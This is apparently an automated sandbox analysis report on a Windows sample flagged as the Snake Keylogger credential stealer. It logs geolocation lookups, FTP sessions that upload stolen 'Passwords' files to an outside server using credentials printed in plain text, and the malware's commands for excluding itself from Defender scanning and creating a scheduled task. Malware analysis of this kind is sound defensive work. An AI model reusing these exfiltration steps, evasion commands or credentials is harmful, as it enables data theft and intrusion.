2024-10-31 09:37:44 UTC	143	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Reg
2024-10-31 09:37:44 UTC	216	IN	Data Raw: 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: ionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	55433	188.114.96.3	443	5040	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:46 UTC	63	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-31 09:37:46 UTC	1216	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:46 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4341 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CMZThcyPMPKosDLYD%2FDLf8ITdQQ9696qzoIaFEnXSycMKDqAgdNBYnP7RI%2FO2Ofr73A4NGEkvHmkWBDmTKw3CzaY0N8DX7LHqNgNOd%2FpJHkG6nYQwDCbFBEkL1otX36EoiARVnbk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2ab1a0de56b91-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1782&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1597352&cwnd=251&unsent_bytes=0&cid=f063199d5d041ad2&ts=160&x=0"
2024-10-31 09:37:46 UTC	153	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Te
2024-10-31 09:37:46 UTC	206	IN	Data Raw: 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: xas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	55436	188.114.96.3	443	5040	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:47 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:37:48 UTC	1218	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:48 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4343 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jrO%2BY5xaMc8xPBLr8kG8EA4QBoUvc2kV3mMTWYep2%2BNJn6Gp2JP6%2FO5aqLDilZ777Rc29JeMkOCjquUhlVQnxDEQumIn9tt5kDvOTFObzPKjwpAjRYv9ePBNUHjWfKk8Tc%2FEOW4t"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2ab22fe86e81b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1314&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2179082&cwnd=239&unsent_bytes=0&cid=25bea5484e12d78a&ts=143&x=0"
2024-10-31 09:37:48 UTC	151	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
2024-10-31 09:37:48 UTC	208	IN	Data Raw: 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 31, 2024 10:37:46.618531942 CET	21	55434	50.31.176.103	192.168.2.8	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 500 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 500 allowed.220-Local time is now 05:37. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 500 allowed.220-Local time is now 05:37. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 500 allowed.220-Local time is now 05:37. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 500 allowed.220-Local time is now 05:37. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Oct 31, 2024 10:37:46.623420954 CET	55434	21	192.168.2.8	50.31.176.103	USER somac@gdmaduanas.com
Oct 31, 2024 10:37:46.771356106 CET	21	55434	50.31.176.103	192.168.2.8	331 User somac@gdmaduanas.com OK. Password required
Oct 31, 2024 10:37:46.771560907 CET	55434	21	192.168.2.8	50.31.176.103	PASS HW=f09RQ-BL1
Oct 31, 2024 10:37:47.045485973 CET	21	55434	50.31.176.103	192.168.2.8	230 OK. Current restricted directory is /
Oct 31, 2024 10:37:47.191927910 CET	21	55434	50.31.176.103	192.168.2.8	504 Unknown command
Oct 31, 2024 10:37:47.192096949 CET	55434	21	192.168.2.8	50.31.176.103	PWD
Oct 31, 2024 10:37:47.337635994 CET	21	55434	50.31.176.103	192.168.2.8	257 "/" is your current location
Oct 31, 2024 10:37:47.337933064 CET	55434	21	192.168.2.8	50.31.176.103	TYPE I
Oct 31, 2024 10:37:47.484729052 CET	21	55434	50.31.176.103	192.168.2.8	200 TYPE is now 8-bit binary
Oct 31, 2024 10:37:47.484982014 CET	55434	21	192.168.2.8	50.31.176.103	PASV
Oct 31, 2024 10:37:47.630646944 CET	21	55434	50.31.176.103	192.168.2.8	227 Entering Passive Mode (50,31,176,103,129,136)
Oct 31, 2024 10:37:47.637638092 CET	55434	21	192.168.2.8	50.31.176.103	STOR 715575 - Passwords ID - ZyiAEnXWZP776659359.txt
Oct 31, 2024 10:37:48.156244040 CET	21	55434	50.31.176.103	192.168.2.8	150 Accepted data connection
Oct 31, 2024 10:37:48.301469088 CET	21	55434	50.31.176.103	192.168.2.8	226-File successfully transferred 226-File successfully transferred226 0.145 seconds (measured here), 2.40 Kbytes per second
Oct 31, 2024 10:37:53.799202919 CET	21	55438	50.31.176.103	192.168.2.8	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 500 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 500 allowed.220-Local time is now 05:37. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 500 allowed.220-Local time is now 05:37. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 500 allowed.220-Local time is now 05:37. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 500 allowed.220-Local time is now 05:37. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Oct 31, 2024 10:37:53.801963091 CET	55438	21	192.168.2.8	50.31.176.103	USER somac@gdmaduanas.com
Oct 31, 2024 10:37:53.959276915 CET	21	55438	50.31.176.103	192.168.2.8	331 User somac@gdmaduanas.com OK. Password required
Oct 31, 2024 10:37:53.961894035 CET	55438	21	192.168.2.8	50.31.176.103	PASS HW=f09RQ-BL1
Oct 31, 2024 10:37:54.139349937 CET	21	55438	50.31.176.103	192.168.2.8	230 OK. Current restricted directory is /
Oct 31, 2024 10:37:54.286748886 CET	21	55438	50.31.176.103	192.168.2.8	504 Unknown command
Oct 31, 2024 10:37:54.286935091 CET	55438	21	192.168.2.8	50.31.176.103	PWD
Oct 31, 2024 10:37:54.432212114 CET	21	55438	50.31.176.103	192.168.2.8	257 "/" is your current location
Oct 31, 2024 10:37:54.432446957 CET	55438	21	192.168.2.8	50.31.176.103	TYPE I
Oct 31, 2024 10:37:54.576706886 CET	21	55438	50.31.176.103	192.168.2.8	200 TYPE is now 8-bit binary
Oct 31, 2024 10:37:54.576853037 CET	55438	21	192.168.2.8	50.31.176.103	PASV
Oct 31, 2024 10:37:54.721275091 CET	21	55438	50.31.176.103	192.168.2.8	227 Entering Passive Mode (50,31,176,103,129,23)
Oct 31, 2024 10:37:54.727039099 CET	55438	21	192.168.2.8	50.31.176.103	STOR 715575 - Passwords ID - ZyiAEnXWZP1206322333.txt
Oct 31, 2024 10:37:55.253367901 CET	21	55438	50.31.176.103	192.168.2.8	150 Accepted data connection
Oct 31, 2024 10:37:55.400563955 CET	21	55438	50.31.176.103	192.168.2.8	226-File successfully transferred 226-File successfully transferred226 0.147 seconds (measured here), 2.36 Kbytes per second

Target ID:	0
Start time:	05:37:22
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\pedido.pif.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\pedido.pif.exe"
Imagebase:	0xc20000
File size:	617'984 bytes
MD5 hash:	ADF22EB2587AB26A966C2C9673580A73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:37:26
Start date:	31/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe"
Imagebase:	0x1b0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:37:26
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:37:26
Start date:	31/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp30EC.tmp"
Imagebase:	0xfb0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:37:26
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:37:27
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\pedido.pif.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\pedido.pif.exe"
Imagebase:	0x930000
File size:	617'984 bytes
MD5 hash:	ADF22EB2587AB26A966C2C9673580A73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3870481673.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000007.00000002.3870481673.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3875604256.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3875604256.0000000002FE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3875604256.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	05:37:28
Start date:	31/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff605670000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:37:28
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe
Imagebase:	0x470000
File size:	617'984 bytes
MD5 hash:	ADF22EB2587AB26A966C2C9673580A73
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:37:33
Start date:	31/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp4B59.tmp"
Imagebase:	0xfb0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:37:33
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:37:34
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe"
Imagebase:	0x6d0000
File size:	617'984 bytes
MD5 hash:	ADF22EB2587AB26A966C2C9673580A73
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.3870518292.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.3870518292.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.3874673292.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.3874673292.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.3874673292.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.1%
Total number of Nodes:	277
Total number of Limit Nodes:	14

Executed Functions

Function 0D6A79D0 Relevance: 6.9, Strings: 5, Instructions: 680
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>, xrefs: 0D6A7D43
>, xrefs: 0D6A7CFC
>, xrefs: 0D6A7CF0
>, xrefs: 0D6A7D4F
./i, xrefs: 0D6A7BBB

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID:
String ID: ./i$>$>$>$>
API String ID: 0-312373307
Opcode ID: 1760db9aa489ccc6af44d88fdbaa88ea5669879dd27df4954bd66d609db27449
Instruction ID: 6f1901503c985401dfb535c462d7accdb4092c98eba78f3225e5619093465358
Opcode Fuzzy Hash: 1760db9aa489ccc6af44d88fdbaa88ea5669879dd27df4954bd66d609db27449
Instruction Fuzzy Hash: B8428D707012058FDB19EB69C550BAEB7F6AF8D700F2484ADE58A9B391CB35ED06CB50

Function 075256B0 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07525737

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: c3863e3ca93a0b74a86216270cabcca2185633acf1a2885dafa2454182a5f813
Instruction ID: 8dfdd332e97fe98603714f3a1db17661bf9ed093c8bf0ab08e76bd134f33a109
Opcode Fuzzy Hash: c3863e3ca93a0b74a86216270cabcca2185633acf1a2885dafa2454182a5f813
Instruction Fuzzy Hash: D821DEB5900359EFCB10DF9AD884ADEBBF5BB48320F10852AE918A7250D374A954CFA1

Function 07521674 Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07525737

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 47e8443a574441caf7336849879194c26180f3674abd5075528d7e1f6498f6f1
Instruction ID: 1067651dad71a7230f42d9f07ed9a876d59b0a779e028505542bf20cb132a10c
Opcode Fuzzy Hash: 47e8443a574441caf7336849879194c26180f3674abd5075528d7e1f6498f6f1
Instruction Fuzzy Hash: 2421EDB5901359EFCB10DF9AD884ADEBBF4FB49320F10842AE918A7350D374A955CFA4

Function 05A7C750 Relevance: .9, Instructions: 904COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1498714208.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a70000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a33773e4b7dedb29a773d4c4ea63db7ebd5330afe1fcdc5620ab6dcd4e6f6db1
Instruction ID: e1722a79ad127a21ed8de88068f150c5496df929b8666aa44bb7ba31c2de0cc8
Opcode Fuzzy Hash: a33773e4b7dedb29a773d4c4ea63db7ebd5330afe1fcdc5620ab6dcd4e6f6db1
Instruction Fuzzy Hash: A4723C70A002199FDB14DFA9C894AAEBBF6FF88314F148569E816EB351DB34DD41CB90

Function 07522A01 Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e04f5b5fd837a6a36cbf40ef96f5439840f5a3bc2620c1aa74d9b5a37dbfc08d
Instruction ID: 22b178a0253e6cf74d87d4808e5d82afcf7200b1c1c4944cc17686fe66de18f1
Opcode Fuzzy Hash: e04f5b5fd837a6a36cbf40ef96f5439840f5a3bc2620c1aa74d9b5a37dbfc08d
Instruction Fuzzy Hash: CF42B0B4E01229CFDB14CF68C984BDDBBB2BF49301F1181A9D809A7394D735AA85DF50

Function 07521720 Relevance: .5, Instructions: 486COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
